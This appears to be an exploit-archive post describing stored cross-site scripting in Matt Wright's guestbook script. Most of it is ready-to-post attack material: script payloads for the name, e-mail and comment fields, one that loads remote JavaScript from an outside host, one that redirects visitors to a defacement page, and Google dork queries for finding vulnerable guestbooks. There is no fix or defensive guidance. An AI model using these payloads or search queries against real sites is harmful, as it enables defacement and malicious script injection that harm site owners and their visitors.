Matt Wright Guestbook Xss Script İnjection

Matt Wright Guestbook Xss Script İnjection

site:http://www.scriptarchive.com/
demo:http://www.scriptarchive.com/readme/guestbook.html

Post This Code:

<script>alert(/Liz0ziM/)</script>

<script src=http://liz0.li.funpic.org/hacked.js&gt;&lt;/script&gt;

<script>location.href="http://evilsite.com/deface.html&quot;;&lt;/script&gt;

vs…

Example Post Message :

Your Name:<script>alert(/Liz0ziM/)</script>
E-Mail:<script>alert(/Liz0ziM/)</script>
URL:blabla
City:blabla , State:blabla Country:blabla
Comments:<script>location.href="http://evilsite.com/deface.html&quot;;&lt;/script&gt;

Credit:Liz0ziM
Mail:[email protected]
Site:www.biyo.tk,www.biyosecurity.be

Google:
"Scripts and guestbook created by: Matt Wright "
inurl:guestbook.html
inurl:addguest.html
inurl:"* Back to the Guestbook Entries"

Source:

http://www.blogcu.com/Liz0ziM/431712/
http://liz0zim.no-ip.org/mattguestbook.html